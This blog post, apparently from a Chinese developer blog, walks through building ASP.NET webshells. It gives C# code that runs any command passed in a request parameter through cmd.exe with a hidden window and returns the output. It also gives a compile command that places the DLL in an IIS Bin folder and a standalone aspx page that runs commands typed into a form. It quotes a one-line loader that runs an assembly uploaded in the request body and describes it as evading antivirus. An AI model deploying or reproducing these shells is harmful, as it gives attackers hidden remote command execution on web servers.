asp.net学习之路--c#asp.net小马

先写一个小马

using System;
using System.Web;
using System.IO;
using System.Diagnostics;
using System.Net;

namespace Recmdy
{
    public partial class Recmd
    {
        public Recmd()
        {
            string cmdx = HttpContext.Current.Request["a"];
            Process oci = new Process();
            oci.StartInfo.FileName = "c:\\windows\\system32\\cmd.exe";
            oci.StartInfo.RedirectStandardOutput = true;
            oci.StartInfo.UseShellExecute = false;//从定向IO流
            oci.StartInfo.Arguments = "/c"+ cmdx;
            oci.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            oci.Start();
            StreamReader txt = oci.StandardOutput;
            string alltxt = txt.ReadToEnd();
            txt.Close();
            txt.Dispose();//释放资源
            HttpContext.Current.Response.Write("<pre>" + alltxt + "</pre>");

        }
    }
}

然后编译

C:\Windows\Microsoft.NET\Framework64\v4.0.30319>csc.exe /t:library /r:System.Web.dll -out:C:\inetpub\wwwroot\Bin\Recmd.dll C:\inetpub\wwwroot\1.aspx.cs

 然后调用在1.aspx

<%@ Page Language="C#" ValidateRequest="false" %>
<%@ Import Namespace="Recmdy" %>
<script runat="server">
    Recmd recmd = new Recmd();
</script>

插曲我很好奇的看了一下以前大佬们写客户端是怎么实现的

<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["a"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

 分析了一波是把本地dll读出来然后以byte的形式穿给web服务器 这样的webshell 理论是完全免杀的

接下来我们来继续构造单个webshe.aspx

<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Web" %>
<script runat="server">
    protected void Recmd(object sender, EventArgs e)
    {
        string item = recmdc.Text;
        Process p = new Process();
        p.StartInfo.FileName = "c:\\windows\\system32\\cmd.exe"; //防止未加入环境变量用绝对路径
        p.StartInfo.UseShellExecute = false;
        p.StartInfo.RedirectStandardInput = true;
        p.StartInfo.RedirectStandardOutput = true;
        p.StartInfo.RedirectStandardError = true;
        p.StartInfo.CreateNoWindow = true;
        string strOutput = null;
        p.Start();
        p.StandardInput.WriteLine(item);//传入命令参数
        p.StandardInput.WriteLine("exit");
        strOutput = p.StandardOutput.ReadToEnd();
        p.WaitForExit();
        p.Close();
        p.Dispose();
        Response.Write("<pre>");
        Response.Write(strOutput);
        Response.Write("</pre>");
    }
    protected void Page_Load(object sender, EventArgs e)
    {
    }
</script>
<form id="form1" runat="server">
<asp:TextBox id="recmdc" runat="server" Text="whoami"/><asp:Button id="bt1" onclick="Recmd" runat="server" Text="exec" />
</form>

 

posted @ 2021-02-04 13:44  yourse1f  阅读(405)  评论(0编辑  收藏  举报